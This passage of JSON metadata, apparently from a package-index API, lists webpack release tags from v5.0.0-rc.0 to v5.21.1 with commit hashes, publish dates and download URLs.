load_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.